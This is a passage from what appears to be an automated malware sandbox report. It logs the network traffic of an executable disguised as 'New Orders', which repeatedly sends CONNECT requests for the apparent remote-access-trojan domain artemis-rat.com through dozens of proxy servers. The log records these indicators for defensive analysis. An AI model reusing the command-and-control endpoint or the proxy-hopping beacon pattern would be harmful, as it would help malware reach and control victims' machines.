                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1313192.168.2.953771103.120.6.46807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.072972059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.446288109 CET343INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 182
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1314192.168.2.95379227.76.193.21310807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.079051971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1315192.168.2.953589117.160.250.131807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.080883026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.242201090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.856364012 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1316192.168.2.953933104.19.106.122807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.084393978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.239094973 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1317192.168.2.953728211.93.2.19073027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.084564924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.568356037 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1318192.168.2.953940104.17.16.87807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.085320950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.240397930 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1319192.168.2.95381731.148.207.153807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.086083889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1320192.168.2.953169115.96.208.12480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.089195967 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:45.488214016 CET72INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1321192.168.2.95388374.119.144.6041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.090111017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1322192.168.2.95389967.43.236.2087057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.090112925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1323192.168.2.951479207.180.234.220397377672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.092804909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.164061069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1324192.168.2.953852139.162.151.17690507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.093405008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:53.168234110 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1325192.168.2.953778175.183.82.22181977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.093971014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1326192.168.2.953831203.112.134.7456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.104321957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1327192.168.2.953819175.183.82.221807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.113447905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.556888103 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1328192.168.2.95387247.243.205.131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.122091055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1329192.168.2.95394567.43.227.227290957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.122448921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.114923954 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1330192.168.2.953847185.220.226.1288087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.122656107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1331192.168.2.953868104.248.151.220639977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.130625010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.835820913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.930613041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.945775032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1332192.168.2.953307162.214.170.144253477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.139034033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148469925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.242235899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.242480040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.265899897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:21.444981098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.444974899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:57.445015907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:45.460686922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1333192.168.2.95137391.134.140.160328967672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.148626089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1334192.168.2.953876103.23.100.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.148994923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1335192.168.2.953864170.84.205.1741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.150317907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1336192.168.2.953879177.67.136.24141537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:45.153609991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
